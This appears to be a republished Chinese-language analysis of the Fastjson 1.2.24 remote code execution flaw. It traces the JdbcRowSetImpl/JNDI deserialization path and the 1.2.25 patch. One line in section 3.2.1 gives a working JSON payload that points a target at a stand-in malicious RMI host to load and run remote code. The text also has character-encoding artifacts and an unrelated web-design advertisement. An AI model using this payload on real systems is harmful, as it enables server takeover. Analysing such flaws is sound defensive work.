怎樣實現(xiàn)Fastjson1.2.24遠程代碼執(zhí)行漏洞分析

這期內(nèi)容當中小編將會給大家?guī)碛嘘P(guān)怎樣實現(xiàn)Fastjson 1.2.24遠程代碼執(zhí)行漏洞分析，文章內(nèi)容豐富且以專業(yè)的角度為大家分析和敘述，閱讀完這篇文章希望大家可以有所收獲。

站在用戶的角度思考問題，與客戶深入溝通，找到磁縣網(wǎng)站設計與磁縣網(wǎng)站推廣的解決方案，憑借多年的經(jīng)驗，讓設計與互聯(lián)網(wǎng)技術(shù)結(jié)合，創(chuàng)造個性化、用戶體驗好的作品，建站類型包括：成都做網(wǎng)站、成都網(wǎng)站制作、成都外貿(mào)網(wǎng)站建設、企業(yè)官網(wǎng)、英文網(wǎng)站、手機端網(wǎng)站、網(wǎng)站推廣、空間域名、雅安服務器托管、企業(yè)郵箱。業(yè)務覆蓋磁縣地區(qū)。

1.漏洞信息

1.1 漏洞簡介

漏洞名稱：Fastjson 1.2.24 Remote Code Execution （com.sun.rowset.JdbcRowSetImpl）

漏洞編號：無

漏洞類型：Remote Code Execution

CVSS評分：無

漏洞危害等級：高危

1.2 組件概述

Fastjson是一個Java語言編寫的高性能功能完善的JSON庫。它采用一種“假定有序快速匹配”的算法，把JSON Parse的性能提升到極致，是目前Java語言中最快的JSON庫。Fastjson接口簡單易用，已經(jīng)被廣泛使用在緩存序列化、協(xié)議交互、Web輸出、Android客戶端等多種應用場景。下圖是Fastjson組件中的反序列化流程。

1.3 漏洞概述

漏洞是利用fastjson autotype在處理json對象的時候，未對@type字段進行完全的安全性驗證，攻擊者可以傳入危險類，并調(diào)用危險類連接遠程rmi主機，通過其中的惡意類執(zhí)行代碼。攻擊者通過這種方式可以實現(xiàn)遠程代碼執(zhí)行漏洞的利用，獲取服務器的敏感信息泄露，甚至可以利用此漏洞進一步對服務器數(shù)據(jù)進行修改，增加，刪除等操作，對服務器造成巨大的影響。

1.4 漏洞利用條件

無

1.5 漏洞影響

影響版本： Fastjson < 1.2.25

1.6 漏洞修復

獲取Fastjson最新版本，下載鏈接：https://github.com/alibaba/fastjson

2.漏洞復現(xiàn)

2.1 環(huán)境拓撲

2.2 應用協(xié)議

8080/HTTP

2.3 復現(xiàn)過程

基于Windows平臺，使用環(huán)境目錄下的fastjsondemo環(huán)境，拷貝后使用Idea打開fastjsondemo文件夾，下載maven資源，運行DemoApplication類，即可啟動環(huán)境。效果如圖。

運行sniper工具箱，填寫表單信息，點擊Attack，效果如圖。

3.漏洞分析

3.1 技術(shù)背景

JavaBean:

JavaBean 是特殊的 Java 類，使用 Java 語言書寫，并且遵守 JavaBean API 規(guī)范。JavaBean的特征：

提供一個默認的無參構(gòu)造函數(shù)。

需要被序列化并且實現(xiàn)了 Serializable 接口。

可能有一系列可讀寫屬性。

可能有一系列的 getter 或 setter 方法。

程序?qū)嵗?/strong>

public class StudentsBean implements java.io.Serializable
{
private String firstName = null;
private String lastName = null;
private int age = 0;

public StudentsBean() {
}
public String getFirstName(){
return firstName;
}
public String getLastName(){
return lastName;
}
public int getAge(){
return age;
}

public void setFirstName(String firstName){
this.firstName = firstName;
}
public void setLastName(String lastName){
this.lastName = lastName;
}
public void setAge(int age) {
this.age = age;
}
}

3.2 詳細分析

3.2.1 漏洞利用過程

首先在本地開啟惡意的rmi服務（rmi://evilserver:1099），并綁定惡意類（evilobj），惡意類中存放著可以執(zhí)行任意命令的java程序。找到fastjson組件入口（一般是傳json字符串的地方），傳入{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://evilserver:1099/evilobj","autoCommit":true}，即可完成漏洞利用。

3.2.2 代碼分析

Fastjson通過parseObject方法解析傳入的json數(shù)據(jù)。

調(diào)用DefaultJSONParser缺省方法對json格式數(shù)據(jù)進行解析。

在方法的參數(shù)中，調(diào)用ParserConfig.getGlobalInstance()方法獲取ParserConfig類中的初始配置，其中黑名單(denyList)也在此類中進行配置。

調(diào)用addDeny方法循環(huán)添加denyList數(shù)組中的黑名單。

回到DefaultJSONParser方法，初始化結(jié)束后，調(diào)用JSONScanner方法對傳入的json字符串設置讀取位置，判斷過程中處理Unicode字符集的BOM標識。

回到DefaultJSONParser方法，為token賦值。

回到JSON入口類，獲取到DefaultJSONParser類型對象，調(diào)用parse()方法進行解析。

在parse方法中，通過判斷l(xiāng)exer.token()，進入對應的代碼塊。

調(diào)用JSONObject構(gòu)造方法，初始化JSONObject類中的map屬性。

回到DefaultJSONParser#parse方法，調(diào)用parseObject方法，對傳入的json數(shù)據(jù)進行字節(jié)讀取。

一般會讀取json字符串中的雙引號進入scanSymbol方法中，在scanSymbol方法中計算字符串的hash。

調(diào)用addSymbol方法，將鍵名添加到SymbolTable中。

回到DefaultJSONParser#parseObject方法中，判斷key值是否為@type。如果是，則進入if判斷條件下的代碼塊中。

調(diào)用scanSymbol方法，以雙引號作為quote變量值，進行@typejson字段值的value讀取。

獲得@type的鍵值，調(diào)用addSymbol方法，將@type的字段值添加到SymbolTable中。

回到DefaultJSONParser#parseObject方法中，調(diào)用TypeUtils.loadClass方法進行類加載操作。

進入loadClass方法中，首先會在現(xiàn)有的mappings中尋找從@type傳入的classname。

如果在原有的mappings中沒有記錄傳入的classname，則調(diào)用contextClassLoader.loadClass獲取AppClassLoader類加載器，并加載到mappings中與@type傳入的類進行關(guān)聯(lián)，最后返回clazz對象。

回到DefaultJSONParser#parseObject方法中，調(diào)用this.config.getDeserializer(clazz)獲取反序列化器。

進入getDeserializer方法中，首先現(xiàn)有的IdentityHashMap中進行hash匹配，如果無法匹配，則進入第二個if判斷條件中重載getDeserializer方法，繼續(xù)獲取反序列化器。

在getDeserializer(Class<?> clazz, Type type)方法中，首先依然會與現(xiàn)有的IdentityHashMap中進行hash匹配。如果無法匹配，會事先進行黑名單匹配，在調(diào)用ServiceLoader.load判斷META-INF/services/下是否存在傳入的classname類。

如果沒有尋找到對應的類，則判斷傳入的classname是否是繼承java.lang.Enum、是否是array類型選擇對應的反序列化器生成方法。如果上述條件不滿足，則繼續(xù)判斷傳入的classname是否為Set、HashSet、Collection、List、ArrayList，如果不是則繼續(xù)判斷classname是否繼承Collection，Map，Throwable接口。如果上述條件都不滿足，則調(diào)用createJavaBeanDeserializer方法生成JavaBean反序列化器。

進入createJavaBeanDeserializer方法，判斷asmEnable是否為true，調(diào)用JavaBeanInfo.build方法建立JavaBean。

建立JavaBean過程中，通過反射機制獲取傳入的class中所有的屬性，方法，并保存在數(shù)組中。選擇一個無參構(gòu)造函數(shù)作為默認的構(gòu)造函數(shù)。

循環(huán)遍歷method數(shù)組中的方法，并從中選取符合條件的方法。（條件：同時滿足方法名長度大于4；非靜態(tài)方法；方法類型為Void?；蛘叻椒愋团c方法所在類相同）

再從篩選的規(guī)則中繼續(xù)篩選出形參數(shù)量為1的方法。

再從篩選出的方法中獲取以set方法開頭的方法，并檢測JavaBean的方法命名規(guī)范，篩選出符合規(guī)范的方法。調(diào)用TypeUtils.getField方法獲取與set方法對應的屬性值。

進入getField方法中，遍歷@type傳入的class以及其父類的所有屬性值，返回尋找到屬性。

最終調(diào)用add方法，將獲取的Field屬性保存到fieldList列表中。

再以相同的流程篩選出存在get方法的屬性值，如果篩選出的filed屬性值不在fieldList，則添加到fieldList列表中。

調(diào)用JavaBeanInfo方法對JavaBeanInfo中的屬性進行初始化，并返回實例化對象。

回到ParserConfig#createJavaBeanDeserializer方法中，獲取到beanInfo對象，并從beaninfo中取出defaultConstructor默認構(gòu)造器、field屬性。

通過檢測fieldClass屬性值，為asmEnable標志位賦值

根據(jù)asmEnable標志位，進行if條件判斷，調(diào)用JavaBeanInfo.build方法，并返回beanInfo對象。再調(diào)用ASMDeserializerFactory#createJavaBeanDeserializer方法生成反序列化器。

進入ASMDeserializerFactory#createJavaBeanDeserializer方法中，通過ASM生成class文件的字節(jié)流，調(diào)用newInstance方法進行實例化，返回實例化對象。

在實例化過程中，會將beaninfo中的屬性賦值給JavaBeanDeserializer類中的filed反序列化器。

回到ParserConfig#getDeserializer方法，調(diào)用putDeserializer方法，將生成的反序列化器與@type傳入的class類進行關(guān)聯(lián)，最后返回反序列化器

回到DefaultJSONParser#parseObject方法，調(diào)用deserializer.deserialze方法進行反序列化。

反序列化過程中，調(diào)用JSONScanner類中與field類型對應的方法，從傳入的json字符串中找到屬性的value值。（例如下圖中，使用scanFieldString方法處理String類型方法）

調(diào)用charArrayCompare判斷傳入的json字符串中，是否存在選中的field的value。如果存在，則通過閉合的雙引號定位傳入?yún)?shù)長度，并提取鍵值對中的value。通過判斷雙引號之后的符號，判斷當前json解析狀態(tài)（返回不同的token值）

再調(diào)用JavaBeanDeserializer#parseRest方法，通過token值進入對應的代碼塊，從生成的sortedFieldDeserializers反序列化器中取出field反序列化器，并從取出屬性值

與上述反序列化流程中第一次取屬性值流程相同，根據(jù)屬性類型，選擇對應的方法進行解析。

調(diào)用setValue方法將json中傳入的屬性值，傳入到class實例化對象中，為其內(nèi)部屬性賦值。

在賦值過程中會通過反射，調(diào)用屬性值對應的set方法

進入connect方法中調(diào)用lookup方法，形參中的getDataSourceName()方法會獲取之前已經(jīng)從json解析并賦值的dataSource屬性，獲取惡意rmi服務。

進入InitialContext.lookup()方法解析之后的流程，就是JNDI注入攻擊流程。

先進入getURLOrDefaultInitCtx方法進行獲取上下文，根據(jù)傳入的url協(xié)議，獲取對應的上下文對象。

實例化RegistryContext對象，調(diào)用getRegistry方法獲取遠程注冊中心的綁定對象。

在獲取遠程對象的過程中，調(diào)用TCPEndpoint()方法，為LiveRef內(nèi)部ed屬性賦予遠程終端ip及端口信息。調(diào)用UnicastRef，獲取RemoteRef類型的遠程對象。

進入createProxy方法獲取并返回RegistryImpl stub。

回到com.sun.jndi.rmi.registry.RegistryContext，將RegistryImpl_Stub對象賦予給registry屬性。

回到GenericURLContext#lookup方法中，調(diào)用Registry.lookup方法。

在lookup方法中調(diào)用registry.lookup()方法，由于之前已經(jīng)將RegistryImpl_Stub賦值給registry，直接進入RegistryImpl_Stub.lookup()方法中。

在RegistryImpl_Stub#lookup方法中，調(diào)用ref.newCall方法獲取基于ref的RemoteCall類型的遠程調(diào)用對象。并將訪問遠程rmi服務上的類名進行序列化，調(diào)用invoke方法傳給遠程服務。

之后將從遠程獲取的序列化數(shù)據(jù)進行反序列化，執(zhí)行惡意序列化中的惡意命令。

3.2.3補丁分析

Fastjson1.2.25版本新增了checkAutoType方法，設置了autotype開關(guān)，對@type字段進行限制。如果autotype開關(guān)關(guān)閉，則無法從@type字段傳入類進行jndi攻擊。

增加了黑名單中的類，對fastjson的gadget進行攔截。

上述就是小編為大家分享的怎樣實現(xiàn)Fastjson 1.2.24遠程代碼執(zhí)行漏洞分析了，如果剛好有類似的疑惑，不妨參照上述分析進行理解。如果想知道更多相關(guān)知識，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。